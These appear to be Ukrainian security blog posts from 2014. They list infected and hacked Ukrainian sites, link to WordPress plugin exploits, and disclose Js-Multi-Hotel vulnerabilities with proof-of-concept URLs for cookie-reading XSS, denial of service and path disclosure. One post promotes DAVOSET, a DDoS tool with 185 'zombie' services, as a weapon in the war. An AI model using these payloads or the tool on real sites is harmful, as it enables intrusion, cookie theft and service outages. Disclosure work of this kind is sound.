Websecurity - Веб безпека

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://tiande-rivne-com-ua.1gb.ua - інфекція була виявлена 29.01.2014. Зараз сайт входить до переліку підозрілих.
• http://mignews.com.ua - інфекція була виявлена 18.03.2014. Зараз сайт не входить до переліку підозрілих.
• http://mignews.com - інфекція була виявлена 18.03.2014. Зараз сайт не входить до переліку підозрілих.
• http://weblog.com.ua - інфекція була виявлена 18.03.2014. Зараз сайт не входить до переліку підозрілих.
• http://statuspress.com.ua - інфекція була виявлена 19.03.2014. Зараз сайт не входить до переліку підозрілих.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Orange, Page Flip Image Gallery та DZS Video Gallery. Для котрих з’явилися експлоіти. Orange - це тема движка, Page Flip Image Gallery - це плагін для створення галереї зображень, DZS Video Gallery - це плагін для створення відео галереї.

• WordPress Orange Cross Site Request Forgery (деталі)
• WordPress Page Flip Image Gallery Shell Upload (деталі)
• WordPress DZS Video Gallery 3.1.3 Remote File Disclosure (деталі)

Стосовно DZS Video Gallery, то це не RFD, а Content Spoofing.

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Виявлені численні уразливості безпеки в Apple Safari.

Уразливі версії: Apple Safari 6.1, Safari 7.0.

Численні пошкодження пам’яті, обхід обмежень.

• APPLE-SA-2014-04-01-1 Safari 6.1.3 and Safari 7.0.3 (деталі)

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://www.dei.gov.ua (хакером Dr.SHA6H) - 27.02.2014 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://www.brusyliv-rda.gov.ua (хакером d3b~X) - 02.03.2014 - похаканий державний сайт, файл хакера все ще розміщений на сайті
• http://ivooptyka.com.ua (хакером SiR Abdou) - 06.03.2014, зараз сайт вже виправлений адмінами
• http://www.aneda.com.ua (хакером DaiLexX) - 04.03.2014, зараз сайт вже виправлений адмінами
• http://c-g.dn.ua (хакерами з Holy Lycans) - 28.03.2014, зараз сайт закритий хостером

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://kalodyx.pp.ua - інфекція була виявлена 18.01.2014. Зараз сайт входить до переліку підозрілих.
• http://expert.ua - інфекція була виявлена 18.03.2014. Зараз сайт не входить до переліку підозрілих.
• http://myinfos.com.ua - інфекція була виявлена 09.04.2014. Зараз сайт входить до переліку підозрілих.
• http://femina.com.ua - інфекція була виявлена 18.03.2014. Зараз сайт не входить до переліку підозрілих.
• http://tradeup.com.ua - інфекція була виявлена 05.04.2014. Зараз сайт не входить до переліку підозрілих.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Blogfolio, Folo та Easy Career Openings. Для котрих з’явилися експлоіти. Blogfolio - це тема движка, Folo - це тема движка, Easy Career Openings - це плагін для створення списку вакансій.

• WordPress Blogfolio Shell Upload (деталі)
• WordPress Folo Theme Cross Site Scripting (деталі)
• WordPress Easy Career Openings SQL Injection (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

У березні, 21.03.2014, я виявив Abuse of Functionality, Denial of Service, Cross-Site Scripting та Full path disclosure уразливості в плагіні Js-Multi-Hotel для WordPress. Про що найближчим часом повідомлю розробникам. Це друга частина уразливостей в цьому плагіні, а з часом я оприлюдню інші дірки.

Раніше я писав про XSS і FPD уразливості в Js-Multi-Hotel для WordPress. Стосовно плагінів для WordPress перед цим я писав про уразливості в VideoWhisper Live Streaming Integration для WP.

Abuse of Functionality (WASC-42):

http://site/wp-content/plugins/js-multihotel/includes/show_image.php?file=http://site&w=1&h=1

DoS (WASC-10):

http://site/wp-content/plugins/js-multihotel/includes/show_image.php?file=http://site/big_file&h=1&w=1

Окрім проведення DoS атак вручну, також можна проводити автоматизовані DoS і DDoS атаки з використанням DAVOSET.

Cross-Site Scripting (WASC-08):

http://site/wp-content/plugins/js-multihotel/includes/delete_img.php?path=%3Cbody%20onload=with(document)alert(cookie)%3E

Про XSS уразливість в refreshDate.php в параметрі roomid я вже писав раніше.

Full path disclosure (WASC-13):

http://site/wp-content/plugins/js-multihotel/includes/functions.php
http://site/wp-content/plugins/js-multihotel/includes/myCalendar.php
http://site/wp-content/plugins/js-multihotel/includes/refreshDate.php?d=
http://site/wp-content/plugins/js-multihotel/includes/show_image.php
http://site/wp-content/plugins/js-multihotel/includes/widget.php
http://site/wp-content/plugins/js-multihotel/includes/phpthumb/GdThumb.inc.php
http://site/wp-content/plugins/js-multihotel/includes/phpthumb/thumb_plugins/gd_reflection.inc.php

Уразливі Js-Multi-Hotel 2.2.1 та попередні версії.

Сьогодні вийшла нова версія програми DAVOSET v.1.1.9. Це Return Of The Bots Edition.

Враховуючи війну Путіна проти України, армія ботів може стати в нагоді. В новій версії:

• Додав нові сервіси в обидва списки зомбі.
• Прибрав неробочі сервіси зі списків зомбі.
• Покращив функцію TestServer.

Всього в списку міститься 185 зомбі-сервісів, які готові нанести удар проти диктатури.

DDoS attacks via other sites execution tool (DAVOSET) - це інструмент для використання Abuse of Functionality уразливостей на одних сайтах, для проведення DoS і DDoS атак на інші сайти.

Скачати: DAVOSET_v.1.1.9.rar.

У березні, 21.03.2014, я виявив Cross-Site Scripting та Full path disclosure уразливості в плагіні Js-Multi-Hotel для WordPress. Про що найближчим часом повідомлю розробникам.

Стосовно плагінів для WordPress раніше я писав про уразливості в VideoWhisper Live Streaming Integration для WordPress.

Я знайшов численні уразливості в цьому плагіні. Ось XSS та FPD уразливості, а з часом оприлюдню інші дірки.

Cross-Site Scripting (WASC-08):

http://site/wp-content/plugins/js-multihotel/includes/timthumb.php?src=%3C%3Cbody%20onload=alert(document.cookie)%3E

Full path disclosure (WASC-13):

http://site/wp-content/plugins/js-multihotel/includes/timthumb.php?src=http://

Уразливі Js-Multi-Hotel 2.2.1 та попередні версії.

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://dfsk.pz.gov.ua (хакером JoKeR_StEx) - 08.01.2014 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://autobaza.pz.gov.ua (хакером JoKeR_StEx) - 08.01.2014 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://xpark.kiev.ua (хакером r3×1337)
• http://business-airlines.com.ua (хакером X45x_dz)
• http://synchroua.com (хакером JoKeR_StEx) - 08.01.2014, зараз сайт вже виправлений адмінами